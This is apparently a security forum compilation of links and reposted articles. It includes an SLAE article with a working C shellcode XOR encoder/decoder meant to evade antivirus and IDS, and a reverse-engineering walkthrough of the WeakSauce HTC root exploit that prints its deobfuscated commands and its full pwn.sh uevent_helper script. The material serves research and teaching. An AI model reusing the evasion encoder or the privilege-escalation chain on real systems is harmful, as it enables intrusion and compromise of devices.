I Hunt Sys Admins - Will Schroeder (@harmj0y)
Collaborative Scanning with Minions: Sharing is Caring - Justin Warner (@sixdub)
Chronicles of a Malware Hunter - Tony Robinson (@da_667)
SSH-Ranking - Justin Brand (@moo_pronto)
Resource Public Key Infrastructure - Andrew Gallo (@akg1330)

Sursa: http://www.irongeek.com/i.php?page=videos%2Fshmoocon-firetalks-2015
-
Linux Commands for Penetration Testers

A collection of hopefully useful Linux commands for pen testers. This is not a complete list, but a collection of commonly used commands + syntax as a sort of "cheatsheet"; the content will be constantly updated as I discover new awesomeness.

Link: https://highon.coffee/docs/linux-commands/
-
Penetration Testing - A Hands-On Introduction to Hacking, by Georgia Weidman

About the Author

Georgia Weidman is a penetration tester and researcher, as well as the founder of Bulb Security, a security consulting firm. She presents at conferences around the world including Black Hat, ShmooCon, and DerbyCon, and teaches classes on topics such as penetration testing, mobile hacking, and exploit development. Her work in mobile security has been featured in print and on television internationally. She was awarded a DARPA Cyber Fast Track grant to continue her work in mobile device security.

Brief Contents

Foreword by Peter Van Eeckhoutte
Acknowledgments
Introduction
Chapter 0: Penetration Testing Primer
Part I: The Basics
Chapter 1: Setting Up Your Virtual Lab
Chapter 2: Using Kali Linux
Chapter 3: Programming
Chapter 4: Using the Metasploit Framework
Part II: Assessments
Chapter 5: Information Gathering
Chapter 6: Finding Vulnerabilities
Chapter 7: Capturing Traffic
Part III: Attacks
Chapter 8: Exploitation
Chapter 9: Password Attacks
Chapter 10: Client-Side Exploitation
Chapter 11: Social Engineering
Chapter 12: Bypassing Antivirus Applications
Chapter 13: Post Exploitation
Chapter 14: Web Application Testing
Chapter 15: Wireless Attacks
Part IV: Exploit Development
Chapter 16: A Stack-Based Buffer Overflow in Linux
Chapter 17: A Stack-Based Buffer Overflow in Windows
Chapter 18: Structured Exception Handler Overwrites
Chapter 19: Fuzzing, Porting Exploits, and Metasploit Modules
Part V: Mobile Hacking
Chapter 20: Using the Smartphone Pentest Framework
Resources
Index

Download: http://www.caluniv.ac.in/free_book/Cyber-Security/Penetration%20Testing%20A%20Hands-On%20Introduction%20to%20Hacking.pdf

Note: The author is a woman. :->
-
-
-
-
-
SLAE: Custom RBIX Shellcode Encoder/Decoder

Anti-Virus and Intrusion Detection Systems could become really nasty during a penetration test. They are often responsible for unstable or ineffective exploit payloads, system lock-downs or even angry penetration testers. The following article is about a simple AV and IDS evasion technique, which could be used to bypass pattern-based security software or hardware. It's not meant to be an all-round solution for bypassing strong heuristic-based systems, but it's a good starting point for further improving this encoding/obfuscation technique. This article therefore covers shellcode encoders and decoders in my SecurityTube Linux Assembly Expert certification series.

Random-Byte-Insertion-XOR Encoding Scheme

The encoding scheme itself is actually quite easy. The idea is to take a random byte as the base for an XOR operation, and to chain the next XOR operation based on the result of the previous one. The same goes for the 3rd and 4th byte. The following flow-graph quickly describes what's happening during the encoding process:

First of all (before step #1 is performed), the encoder splits the input shellcode into multiple blocks with a length of 3 bytes each and adds a random byte (value 0x01 to 0xFF) at the beginning of each of those blocks, so that these random bytes differ from block to block. If the shellcode is not aligned to these 3-byte blocks, an additional NOP-padding (0x90) is added to the last block.

During the second step, the encoder XORs the first byte (the random byte) with the second byte (this is originally the first byte of the shellcode) and overwrites the second byte with the XOR result. The third step takes the result from the first XOR operation and XORs it again with the third byte, and the last step does the same and XORs the result of the previous XOR operation with the last byte of the block. This results in a completely shredded-looking piece of memory.

Full article: https://www.rcesecurity.com/2015/01/slae-custom-rbix-shellcode-encoder-decoder/
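Since the flow-graph from the original post is not reproduced in this repost, here is a tiny C sketch of the scheme as I read the description above: 3-byte blocks, one random prefix byte per block, then a chained XOR through the block. The function names and the sample bytes are placeholders of mine; the actual SLAE submission pairs such an encoder with a decoder stub written in assembly.

/* Sketch of the described RBIX scheme: 3-byte blocks, one random prefix
 * byte per block, then chained XOR through the block. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#define BLOCK_IN  3   /* plain bytes per block   */
#define BLOCK_OUT 4   /* random byte + 3 encoded */

/* Encode: out must hold 4 * ceil(len/3) bytes; returns the encoded length. */
size_t rbix_encode(const unsigned char *in, size_t len, unsigned char *out)
{
    size_t blocks = (len + BLOCK_IN - 1) / BLOCK_IN, o = 0;
    for (size_t b = 0; b < blocks; b++) {
        unsigned char prev = (unsigned char)((rand() % 0xFF) + 1); /* 0x01..0xFF */
        out[o++] = prev;                      /* random prefix byte */
        for (size_t i = 0; i < BLOCK_IN; i++) {
            size_t idx = b * BLOCK_IN + i;
            unsigned char plain = idx < len ? in[idx] : 0x90; /* NOP padding */
            prev ^= plain;        /* chain: result of the previous XOR is the key */
            out[o++] = prev;
        }
    }
    return o;
}

/* Decode: undo the chain, dropping the random prefix bytes. */
size_t rbix_decode(const unsigned char *in, size_t len, unsigned char *out)
{
    size_t o = 0;
    for (size_t b = 0; b + BLOCK_OUT <= len; b += BLOCK_OUT)
        for (size_t i = 1; i < BLOCK_OUT; i++)
            out[o++] = in[b + i] ^ in[b + i - 1];
    return o;
}

int main(void)
{
    /* placeholder "shellcode" bytes, just for the round-trip test */
    unsigned char sc[] = { 0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73 };
    unsigned char enc[16], dec[16];

    srand((unsigned)time(NULL));
    size_t elen = rbix_encode(sc, sizeof(sc), enc);
    size_t dlen = rbix_decode(enc, elen, dec);

    printf("decoded matches original (plus NOP pad): %s\n",
           dlen >= sizeof(sc) && memcmp(sc, dec, sizeof(sc)) == 0 ? "yes" : "no");
    return 0;
}

The matching decoder stub only has to run the chain in reverse (each plain byte is the XOR of two adjacent encoded bytes), which is what makes the scheme cheap to implement in a handful of assembly instructions.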
-
Analyzing the WeakSauce Exploit
Jonathan Levin

As part of the devices I researched for my upcoming book on Android Internals, I got myself an HTC One M8. A chief factor in my decision was knowing that it had a working 1-click root, since I didn't want to root it using a bootloader unlock (which would ruin the prospects of selling it on eBay once I'm done). The exploit for the One M8 is called WeakSauce, and has been published on XDA Developers by members jcase (who discovered the vulnerability) and beaups (who helped exploit it). It's packaged as a simple APK, which you can download and push to the device, but I couldn't find much documentation on how it works, though it had been classified as an HTC specific vulnerability, and not a generic one in KitKat. Since I have a chapter dealing with security, it made sense to try and figure out exactly what the exploit is doing. This article was created to detail the process, and is written as a tutorial. Going along, I hope to publish more of these articles as updates to the book, as I have with the OS X/iOS book.

Step I: Examine the APK

Getting the APK is a simple enough matter, as it is freely and readily downloadable. After getting it, we can unzip to examine its contents:

morpheus@Ergo (~/tmp)$ unzip -l WeakSauce-1.0.1.apk
Archive: ../../WeakSauce-1.0.1.apk
  Length     Date    Time   Name
 --------    ----    ----   ----
      630  03-30-14 10:20   META-INF/MANIFEST.MF
      751  03-30-14 10:20   META-INF/TIMEPINK.SF
      912  03-30-14 10:20   META-INF/TIMEPINK.RSA
   853044  03-30-14 10:19   assets/busybox
 52428800  03-30-14 10:19   assets/xbin.img
     3067  03-30-14 10:19   res/drawable/ic_launcher.png
      652  03-30-14 10:20   res/layout/activity_main.xml
      464  03-30-14 10:20   res/menu/main.xml
     2840  03-30-14 10:20   AndroidManifest.xml
     1852  03-30-14 10:19   resources.arsc
   705756  03-30-14 10:19   classes.dex
 --------                   -------
 53998768                   11 files

As the above shows, the APK has no JNI functionality (otherwise it would have a lib/ subfolder). The only "unusual" thing about it is the assets - the APK packages busybox (the all-in-one binary, statically compiled) and an image of xbin (an ext4 loopback mount image). The manifest is also quite simple (I XMLized the relevant portions):

morpheus@Ergo (~/tmp)$ aapt d xmltree WeakSauce-1.0.1.apk AndroidManifest.xml | xmlize
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.cunninglogic.weaksauce"
          android:versionCode="1"
          android:versionName="1.0.1">
...
  <uses-permission android:name="android.permission.INTERNET">
  <uses-permission android:name="android.permission.BLUETOOTH">
  <uses-permission android:name="android.permission.BLUETOOTH_ADMIN">
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED">
  <application ...>
  ..
    <intent-filter>
      <action android:name="android.intent.action.BOOT_COMPLETED" />
      <action android:name="android.intent.action.QUICKBOOT_POWERON" />
    </intent-filter>
  </receiver>
  </application>
</manifest>

The only thing that's intriguing is why WeakSauce needs BlueTooth permissions. This will be explained shortly.

Step II: dexter

The dexter is a simple DEX file parser and extractor I wrote as an appendix to Chapter 10 of the book, which deals with the internals of the Dalvik VM. The tool is an improvement on the well known dexdump utility, in that it is more Java-aware, and can also perform some decompilation. Using it to dump the classes revealed some 521 classes, of which the vast majority were Android support classes - so these could be outright ignored.
morpheus@Ergo (~/tmp)$ dexter --classes classes.dex | grep -v " android" Class Defs: 521 bytes @0x17540 Class 343: Package: com.cunninglogic.weaksauce Class: D; (y) Class 344: Package: com.cunninglogic.weaksauce Class: G; (y) Class 345: Package: com.cunninglogic.weaksauce Class: H; (y) Class 346: Package: com.cunninglogic.weaksauce Class: J; (l) Class 347: Package: com.cunninglogic.weaksauce Class: K; (v) Class 348: Package: com.cunninglogic.weaksauce Class: M; (y) Class 349: Package: com.cunninglogic.weaksauce Class: MainActivity; (v) Class 350: Package: com.cunninglogic.weaksauce Class: OnBootReceiver; (w) Class 351: Package: com.cunninglogic.weaksauce Class: Weak; (f) Class 352: Package: com.cunninglogic.weaksauce Class: b; (y) Class 353: Package: com.cunninglogic.weaksauce Class: c; (v) Class 354: Package: com.cunninglogic.weaksauce Class: f; (y) Class 355: Package: com.cunninglogic.weaksauce Class: i; (y) Class 356: Package: com.cunninglogic.weaksauce Class: j; (y) Class 357: Package: com.cunninglogic.weaksauce Class: k; (y) Class 358: Package: com.htc.engine.system Class: SystemAccess ® morpheus@Ergo (~/tmp)$ dexter --extract com.cunninglogic.weaksauce classes.dex Extracting all classes belonging to com.cunninglogic.weaksauce Package... 15 Classes extracted. morpheus@Ergo (~/tmp)$ dexter --extract "com.htc*" classes.dex Extracting all classes matching "com.htc*" 1 Class extracted. Aside from the android support classes, which are nothing special), only has the com.cunninglogic.weaksauce package classes - obfuscated, as is readily seen from the class names - and the com.htc.engine.system.SystemAccess.class - which is a replacement class for the similarly named class on the phone. Step II': dex2jar Since imgtool is not out yet at the time I'm writing this (it will be released with the book), you can use the dex2jar tool to unpack the classes. This is a simple, yet powerful utility, which undoes the work performed by the SDK's dx. Whereas the latter takes the Java classes of the APK, in JAR form, and creates a classes.dex, the former converts the classes.dex back into a JAR file. The usage is straightforward. Unpacking, you should get a classes-dex2jar.jar file, which you can unzip. morpheus@Ergo (~/tmp)$ unzip -l classes-dex2jar.jar Archive: classes-dex2jar.jar Length Date Time Name -------- ---- ---- ---- 0 05-15-14 15:54 android/ 0 05-15-14 15:54 android/support/ 0 05-15-14 15:54 android/support/v4/ # .. miscellaneous android/support/v4 classes that are totally irrelevant ... 
0 05-15-14 15:54 com/ 0 05-15-14 15:54 com/cunninglogic/ 0 05-15-14 15:54 com/cunninglogic/weaksauce/ 236 05-15-14 15:54 com/cunninglogic/weaksauce/D.class 281 05-15-14 15:54 com/cunninglogic/weaksauce/G.class 306 05-15-14 15:54 com/cunninglogic/weaksauce/H.class 159 05-15-14 15:54 com/cunninglogic/weaksauce/J.class 755 05-15-14 15:54 com/cunninglogic/weaksauce/K.class 281 05-15-14 15:54 com/cunninglogic/weaksauce/M.class 3203 05-15-14 15:54 com/cunninglogic/weaksauce/MainActivity.class 674 05-15-14 15:54 com/cunninglogic/weaksauce/OnBootReceiver.class 8512 05-15-14 15:54 com/cunninglogic/weaksauce/Weak.class 331 05-15-14 15:54 com/cunninglogic/weaksauce/b.class 653 05-15-14 15:54 com/cunninglogic/weaksauce/c.class 281 05-15-14 15:54 com/cunninglogic/weaksauce/f.class 1194 05-15-14 15:54 com/cunninglogic/weaksauce/i.class 281 05-15-14 15:54 com/cunninglogic/weaksauce/j.class 306 05-15-14 15:54 com/cunninglogic/weaksauce/k.class 0 05-15-14 15:54 com/htc/ 0 05-15-14 15:54 com/htc/engine/ 0 05-15-14 15:54 com/htc/engine/system/ 1249 05-15-14 15:54 com/htc/engine/system/SystemAccess.class # .. miscellaneous android/support/v4 classes that are totally irrelevant ... 540 05-15-14 15:55 android/support/v4/view/ViewCompat$KitKatViewCompatImpl.class -------- ------- 849028 550 files Step III: Deobfuscation The classes extracted from the APK are obfuscated, but it's a simple enough matter to deobfuscate them. Looking at the SystemAccess as an example, we see: System.load(i.m("JR\033C\007]\026TTo'\003\003O\007E\017\035\000A\b`2[\024U\026U\000UKU\n")); Which implies the strings (in this case, presumably the name of a native library) are also obfuscated. The implementation of i.m shows: package com.cunninglogic.weaksauce; public final class i { public static String m(String paramString) { StackTraceElement localStackTraceElement = new java.lang.Exception().getStackTrace()[1]; String str = localStackTraceElement.getMethodName() + localStackTraceElement.getClassName(); .. The i.m method relies on its caller - obtained through the stack trace - as a key to the obfuscation. With that in mind, it's simple to create an m2, which also gets the class and method names as arguments. That is: public static String m2(String paramString, String MethodName, String ClassName) { StackTraceElement localStackTraceElement = new java.lang.Exception().getStackTrace()[1]; String str = localStackTraceElement.getMethodName() + localStackTraceElement.getClassName(); // Override: str = MethodName + ClassName; // and we can now call this function instead of the old m, // e.g. SystemAccess.m2("\000ZP\\\026\001v2KFC\004TXOD", // "com.cunninglogic.weaksauce.Weak", // "m"); So, after a little bit of search and replace we can reveal that the above string is really: "system/lib/libdm-systemaccess.so". It turns out there is a similarly named m method in SystemClass.java, used extensively by the Weak class (which performs the bulk of the work). This method obfuscates by taking using the classname, and then the method name (that is, in reverse). Deobfuscating all of the strings used in Weak class yields: data/data/com.cunninglogic.weaksauce/temp/xbin.img system/bin/chmod 755 /data/data/com.cunninglogic.weaksauce/temp/pwn.sh /system/bin/chmod 755 /data/data/com.cunninglogic.weaksauce/temp/busybox system/bin/echo 1 > /data/data/com.cunninglogic.weaksauce/temp/one /system/bin/chmod 770 /data/data/com.cunninglogic.weaksauce/temp/one ... 
/system/bin/sync echo '/data/data/com.cunninglogic.weaksauce/temp/pwn.sh' > /sys/kernel/uevent_helper /system/bin/sync /system/bin/chmod 770 /data/data/com.cunninglogic.weaksauce/temp /system/bin/sync /data/data/com.cunninglogic.weaksauce/temp /system/bin/echo 1 > /data/data/com.cunninglogic.weaksauce/temp/onboot data/data/com.cunninglogic.weaksauce/temp/pwn.sh So - what do we have? A lot of shell commands. Root access is somehow obtained, then these commands are run. Of particular interest is data/data/com.cunninglogic.weaksauce/temp/pwn.sh, which looks like the "pwn script". Note (in the above echo command) it gets written to /sys/kernel/uevent_helper, which is expected to contain the name of a binary launched by the kernel on device addition. This file is writable only by root, however, so the exploit must be doing something before writing to it. Indeed, looking at the device post-exploitation, we see: root@htc_m8wl:/data/data/com.cunninglogic.weaksauce/temp # ls -l /sys/kernel/ .. -rwxrwx--- u0_a235 u0_a235 4096 2014-05-16 14:21 uevent_helper -r--r--r-- root root 4096 2014-05-16 14:30 uevent_seqnum .. Showing that /sys/kernel/uevent_helper has been chown'ed to be WeakSauce's. Since the root exploit works and we have access to all the directories, we can just navigate to WeakSauce's directory, and see: root@htc_m8wl:/data/data/com.cunninglogic.weaksauce/temp # cat pwn.sh #!/system/bin/sh echo 1 > /sys/kernel/uevent_helper /system/bin/cat /system/xbin/dexdump > /data/data/com.cunninglogic.weaksauce/temp/dexdump /system/bin/cat /system/xbin/nc > /data/data/com.cunninglogic.weaksauce/temp/nc /system/bin/cat /system/xbin/dexus > /data/data/com.cunninglogic.weaksauce/temp/dexus /system/bin/chmod 744 /data/data/com.cunninglogic.weaksauce/temp//nc /system/bin/chmod 755 /data/data/com.cunninglogic.weaksauce/temp/dexus /system/bin/chmod 755 /data/data/com.cunninglogic.weaksauce/temp/dexdump /data/data/com.cunninglogic.weaksauce/temp/busybox mount /data/data/com.cunninglogic.weaksauce/temp/xbin.img /system/xbin /system/bin/sync /system/bin/cat /data/data/com.cunninglogic.weaksauce/temp/nc > /system/xbin/nc /system/bin/cat /data/data/com.cunninglogic.weaksauce/temp/dexus > /system/xbin/dexus /system/bin/cat /data/data/com.cunninglogic.weaksauce/temp/dexdump > /system/xbin/dexdump /system/bin/chmod 744 /system/xbin/nc /system/bin/chmod 755 /system/xbin/dexus /system/bin/chmod 755 /system/xbin/dexdump /system/bin/chown 0.2000 /system/xbin/nc /system/bin/chown 0.2000 /system/xbin/dexus /system/bin/chown 0.2000 /system/xbin/dexdump /system/xbin/daemonsu --auto-daemon & So all that would be needed is to get the kernel to detect a new device. This is why Weaksauce required bluetooth permissions - looking at the Weak class we see: SystemAccess.m().CopyFileCtl( SystemAccess.m("\002DGWD\004IDWN\006\001\013V\023JZCENOXUBLP\\\001^LN\t\027zhJJ\002_BLQ\b"), SystemAccess.m("NOB"), SystemAccess.m("M\027bn\006DHYIDM\b"), SystemAccess.m("Z\007\022~s]pENKQDU")); // /system/bin/sync m(SystemAccess.m("\000ZP\\\026\001v2KFC\004TXOD")); //m ("echo '/data/data/com.cunninglogic.weaksauce/temp/pwn.sh' > /sys/kernel/uevent_helper"); m(SystemAccess.m("HHQP\017\016\006K\003\020z2MNYJ\bBNJ\001JVKON\f\003CF^VA\nUADHQE^......")); // /system/bin/sync m(SystemAccess.m("\000ZP\\\026\001v2KFC\004TXOD")); // ... 
localBluetoothAdapter = BluetoothAdapter.getDefaultAdapter();
bool1 = localBluetoothAdapter.isEnabled();
if (!bool1)
{
    localBluetoothAdapter.enable();
}

The call to CopyFileCtl is the important one here - this was defined as a native method of the replaced com.htc.engine.system.SystemAccess class. As it so happens, this does, in fact, turn out to be a JNI library, with the corresponding method defined as:

[morpheus@Forge ~]$ /usr/local/android-ndk-r8e/toolchains/arm-linux-androideabi-4.7/prebuilt/\
linux-x86_64/bin/arm-linux-androideabi-objdump -d libdm-systemaccess.so
...
00001d60 <Java_com_htc_engine_system_SystemAccess_CopyFileCtl>:
..

The fault lies in this function, which calls HTC's dmagent (through the /dev/socket/dmsocket socket). The daemon (running as root, naturally) performs the copying, but along the way the file permissions get incorrectly chmod'ed. Game over.

Summary

This article detailed how WeakSauce works. To recap:

1. WeakSauce creates a replacement class for HTC's SystemAccess.
2. Using JNI, it triggers a file copy operation, passing /sys/kernel as one of its arguments.
3. The dmagent daemon happily complies, and chowns the permissions on /sys/kernel/uevent_helper.
4. WeakSauce readily exploits this by writing its pwn.sh as the uevent handler.
5. WeakSauce disables/enables BlueTooth, which makes the kernel trigger the uevent_helper - that is, pwn.sh.

From this point on, it's all downhill - DaemonSu is installed, which is required in KitKat since a simple setuid /system/xbin/su wouldn't work - the SELinux context would confine even a root owned process to u:r:shell:s0 (this is explained in Chapter 21, which deals with security). This way, when you type "su", you're actually going to a daemonsu, which runs as u:r:kernel:s0, and spawns you an unrestricted tmp-mksh. You can see that with ps -Z:

#
# Show all processes, filter out kernel threads, but still show u:r:kernel:s0 context:
#
root@htc_m8wl:/# ps -Z | grep -v " 2 " | grep kernel
u:r:kernel:s0 root 3113 1    daemonsu:mount:master
u:r:kernel:s0 root 3114 3113 daemonsu:master
u:r:kernel:s0 root 5449 3114 daemonsu:10236
u:r:kernel:s0 root 6559 3114 daemonsu:0
u:r:kernel:s0 root 6567 6559 daemonsu:0:6556
u:r:kernel:s0 root 6569 6567 daemonsu
u:r:kernel:s0 root 6572 6567 tmp-mksh
u:r:kernel:s0 root 7521 6572 ps
u:r:kernel:s0 root 7522 6572 grep
u:r:kernel:s0 root 7523 6572 grep
#
# Note the adb spawned shell is the parent of su, which is why they're both still
# u:r:shell:s0..
root@htc_m8wl:/# ps -Z | grep 6530
u:r:shell:s0 shell 6530 3618 /system/bin/sh
u:r:shell:s0 shell 6556 6530 su
..

And that's all. If you haven't yet checked out the book, please do so now, and feel free to drop me a line at j@ (this domain) for any questions, comments, or requests.

Greets jcase and beaups - Great work, you guys. HTC owes you another customer (for now, at least)

Sursa: http://www.newandroidbook.com/Articles/HTC.html